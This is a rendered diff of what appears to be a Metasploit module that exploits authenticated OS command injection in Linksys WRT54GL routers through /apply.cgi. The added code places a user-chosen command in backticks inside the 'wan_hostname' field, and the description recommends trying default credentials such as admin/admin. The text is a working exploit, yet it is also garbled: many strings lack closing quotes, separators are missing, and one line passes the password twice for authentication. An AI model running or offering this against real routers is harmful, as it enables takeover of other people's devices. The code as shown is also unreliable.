@@ -16,7 +16,7 @@ def initialize(info = {})
1616 'Name' => 'Linksys WRT54GL Remote Command Execution' ,
1717 'Description' => %q{
1818 Some Linksys Routers are vulnerable to OS Command injection.
19- You will need credentials to the webinterface to access the vulnerable part
19+ You will need credentials to the web interface to access the vulnerable part
2020 of the application.
2121 Default credentials are always a good starting point. admin/admin or admin
2222 and blank password could be a first try.
@@ -34,68 +34,65 @@ def initialize(info = {})
3434 [
3535 [ 'URL' , 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ] ,
3636 [ 'URL' , 'http://www.s3cur1ty.de/m1adv2013-01' ] ,
37+ [ 'URL' , 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ] ,
3738 [ 'EDB' , '24202' ] ,
3839 [ 'BID' , '57459' ] ,
40+ [ 'OSVDB' , '89421' ] ,
3941 ] ,
4042 'DefaultTarget' => 0 ,
4143 'DisclosureDate' => 'Jan 18 2013' ) )
4244
4345 register_options (
4446 [
4547 Opt ::RPORT ( 80 ) ,
46- OptString . new ( 'VULNPATH ' , [ true , 'PATH to OS Command Injection' , '/apply.cgi' ] ) ,
47- OptString . new ( 'USER ' , [ true , 'User to login with' , 'admin' ] ) ,
48- OptString . new ( 'PASS ' , [ true , 'Password to login with' , 'password' ] ) ,
48+ OptString . new ( 'TARGETURI ' , [ true , 'PATH to OS Command Injection' , '/apply.cgi' ] ) ,
49+ OptString . new ( 'USERNAME ' , [ true , 'User to login with' , 'admin' ] ) ,
50+ OptString . new ( 'PASSWORD ' , [ true , 'Password to login with' , 'password' ] ) ,
4951 OptString . new ( 'CMD' , [ true , 'The command to execute' , 'ping 127.0.0.1' ] ) ,
5052 OptString . new ( 'NETMASK' , [ false , 'LAN Netmask of the router' , '255.255.255.0' ] ) ,
51- OptString . new ( 'LANIP' , [ false , 'LAN IP address of the router' , '<RHOST> ' ] ) ,
53+ OptAddress . new ( 'LANIP' , [ false , 'LAN IP address of the router - CHANGE THIS ' , '1.1.1.1 ' ] ) ,
5254 OptString . new ( 'ROUTER_NAME' , [ false , 'Name of the router' , 'cisco' ] ) ,
5355 OptString . new ( 'WAN_DOMAIN' , [ false , 'WAN Domain Name' , 'test' ] ) ,
5456 OptString . new ( 'WAN_MTU' , [ false , 'WAN MTU' , '1500' ] ) ,
5557 ] , self . class )
5658 end
5759
5860 def run
59- #setting up the needed variables
60- uri = datastore [ 'VULNPATH ' ]
61- user = datastore [ 'USER ' ]
61+ #setting up some basic variables
62+ uri = datastore [ 'TARGETURI ' ]
63+ user = datastore [ 'USERNAME ' ]
6264 rhost = datastore [ 'RHOST' ]
6365 netmask = datastore [ 'NETMASK' ]
6466 routername = datastore [ 'ROUTER_NAME' ]
6567 wandomain = datastore [ 'WAN_DOMAIN' ]
6668 wanmtu = datastore [ 'WAN_MTU' ]
6769
68- # using the RHOST for the correct lan IP settings
69- # WARNING: Attacks via the WAN IP are breaking the LAN configuration of the device!
70- if datastore [ 'LANIP' ] !~ /<RHOST>/
70+ if datastore [ 'LANIP' ] !~ /1.1.1.1/
71+ #there is a configuration from the user so we use LANIP for the router configuration
7172 ip = datastore [ 'LANIP' ] . split ( '.' )
7273 else
74+ #no configuration from user so we use RHOST for the router configuration
7375 ip = rhost . split ( '.' )
7476 end
7577
7678 # not sure if this is a good way for blank passwords:
77- if datastore [ 'PASS ' ] == "<BLANK>"
79+ if datastore [ 'PASSWORD ' ] == "<BLANK>"
7880 pass = ""
7981 else
80- pass = datastore [ 'PASS ' ]
82+ pass = datastore [ 'PASSWORD ' ]
8183 end
8284
8385 print_status ( "Trying to login with #{ user } #{ pass } )
8486
85- user_pass = Rex ::Text . encode_base64 ( user + ":" + pass )
86-
8787 begin
8888 res = send_request_cgi ( {
8989 'uri' => uri ,
9090 'method' => 'GET' ,
91- 'headers' =>
92- {
93- 'Authorization' => "Basic #{ user_pass } ,
94- }
95- } , 25 )
91+ 'basic_auth' => "#{ user } #{ pass }
92+ } )
9693
9794 unless ( res . kind_of? Rex ::Proto ::Http ::Response )
98- vprint_error ( "#{ target_url } )
95+ vprint_error ( "#{ rhost } )
9996 end
10097
10198 return :abort if ( res . code == 404 )
@@ -108,16 +105,17 @@ def run
108105 end
109106
110107 rescue ::Rex ::ConnectionError
111- vprint_error ( "#{ target_url } )
108+ vprint_error ( "#{ rhost } )
112109 return :abort
113110 end
114111
115112 print_status ( "Sending remote command: " + datastore [ 'CMD' ] )
116113
117- cmd = Rex ::Text . uri_encode ( datastore [ 'CMD' ] )
118- # cmd = datastore['CMD']
114+ # cmd = Rex::Text.uri_encode(datastore['CMD'])
115+ cmd = datastore [ 'CMD' ]
119116
120- data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{ routername } #{ cmd } #{ wandomain } #{ wanmtu } #{ ip [ 0 ] } #{ ip [ 1 ] } #{ ip [ 2 ] } #{ ip [ 3 ] } #{ netmask }
117+ #original Post Request:
118+ # data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1"
121119
122120 if datastore [ 'VERBOSE' ] == true
123121 print_line ( "using the following target URL: \n #{ uri } )
@@ -128,17 +126,66 @@ def run
128126 {
129127 'uri' => uri ,
130128 'method' => 'POST' ,
131- 'headers' =>
132- {
133- 'Authorization' => "Basic #{ user_pass } ,
134- } ,
135- 'data' => data_cmd ,
136- } , 20 )
129+ 'basic_auth' => "#{ pass } #{ pass } ,
130+ #'data' => data_cmd,
131+
132+ 'vars_post' =>
133+ {
134+ 'submit_button' => "index" ,
135+ 'change_action' => "1" ,
136+ 'submit_type' => "1" ,
137+ 'action' => "Apply" ,
138+ 'now_proto' => "dhcp" ,
139+ 'daylight_time' => "1" ,
140+ 'lan_ipaddr' => "4" ,
141+ 'wait_time' => "0" ,
142+ 'need_reboot' => "0" ,
143+ 'ui_language' => "de" ,
144+ 'wan_proto' => "dhcp" ,
145+ 'router_name' => "#{ routername } ,
146+ 'wan_hostname' => "`#{ cmd } ,
147+ 'wan_domain' => "#{ wandomain } ,
148+ 'mtu_enable' => "1" ,
149+ 'wan_mtu' => "#{ wanmtu } ,
150+ 'lan_ipaddr_0' => "#{ ip [ 0 ] } ,
151+ 'lan_ipaddr_1' => "#{ ip [ 1 ] } ,
152+ 'lan_ipaddr_2' => "#{ ip [ 2 ] } ,
153+ 'lan_ipaddr_3' => "#{ ip [ 3 ] } ,
154+ 'lan_netmask' => "#{ netmask } ,
155+ 'lan_proto' => "dhcp" ,
156+ 'dhcp_check' => "1" ,
157+ 'dhcp_start' => "100" ,
158+ 'dhcp_num' => "50" ,
159+ 'dhcp_lease' => "0" ,
160+ 'wan_dns' => "4" ,
161+ 'wan_dns0_0' => "0" ,
162+ 'wan_dns0_1' => "0" ,
163+ 'wan_dns0_2' => "0" ,
164+ 'wan_dns0_3' => "0" ,
165+ 'wan_dns1_0' => "0" ,
166+ 'wan_dns1_1' => "0" ,
167+ 'wan_dns1_2' => "0" ,
168+ 'wan_dns1_3' => "0" ,
169+ 'wan_dns2_0' => "0" ,
170+ 'wan_dns2_1' => "0" ,
171+ 'wan_dns2_2' => "0" ,
172+ 'wan_dns2_3' => "0" ,
173+ 'wan_wins' => "4" ,
174+ 'wan_wins_0' => "0" ,
175+ 'wan_wins_1' => "0" ,
176+ 'wan_wins_2' => "0" ,
177+ 'wan_wins_3' => "0" ,
178+ 'time_zone' => "-08+1+1" ,
179+ '_daylight_time' => '1'
180+ } ,
181+ } )
137182 rescue ::Rex ::ConnectionError
138- vprint_error ( "#{ target_url } )
183+ vprint_error ( "#{ rhost } )
139184 return :abort
140185 end
141- print_status ( "Blind Exploitation - wait 5 seconds until the configuration gets applied\n " )
186+ print_line ( "" )
187+ print_status ( "Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed" )
142188 print_status ( "Blind Exploitation - unknown Exploitation state\n " )
143189 end
144190end
191+
0 commit comments